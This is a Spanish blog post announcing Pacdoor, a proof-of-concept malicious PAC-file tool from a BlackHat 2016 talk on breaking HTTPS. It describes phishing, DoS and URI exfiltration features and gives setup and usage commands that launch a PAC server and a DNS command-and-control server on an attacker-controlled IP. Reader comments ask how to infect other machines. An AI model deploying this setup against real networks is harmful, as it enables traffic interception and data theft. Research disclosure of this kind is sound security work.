Pacdoor: malware implementado como fichero .PAC (Proxy Auto-Configuration)

Ya empieza a liberarse material de la BlackHat USA 2016 que seguro dará que hablar mucho durante las próximas semanas, si no meses...

La primera charla que destacamos es 'Crippling HTTPS with Unholy PAC' de Itzik Kotler y Amit Klein de SafeBreach Labs en la que demostraban que forzando al navegador/sistema a usar un recurso PAC malicioso (Proxy Autoconfiguration) es posible comprometer hasta la sesiones en sitios accediendo bajo HTTPS.

Para la "prueba de concepto" han publicado la herramienta Pacdoor, una especie de malware para PAC (javascript malicioso en el fichero .pac) que establece un canal de comunicación bidireccional (cliente-servidor en Python), puede realizar phishing contextual a través de mensajes, tiene opciones DoS y permite la extracción de datos sensibles de las URIs. Además es multiplataforma (Linux, Windows, Mac) y multinavegador (IE, Chrome, Safari).

Instalación

Pacdoor requiere Python 2.7.x.

$ git clone https://github.com/SafeBreach-Labs/pacdoor.git
$ cd pacdoor
$ cd server
$ pip install -r requirements.txt


Uso

# Assuming WPAD-enabled Machine on Interface `vmnet2'
./usr/local/sbin/dhcpd -d vmnet2
./pac_websrv.py 80
# Assume attacker controlled machine IP is 192.168.150.1
./dns_cnc_srv.py -wsrv 192.168.150.1


Github: https://github.com/SafeBreach-Labs/pacdoor

3 comentarios :

  1. Bastante interesante.

    ResponderEliminar
  2. podrian explicar un poco mas el uso? no me quedo claro como se ejecuta e infecta en otra maquina, perdon por las molestias. gracias

    ResponderEliminar
  3. Amigo buen tuto pero tiene que explicacar más destallado de como infectar a la máquinas

    ResponderEliminar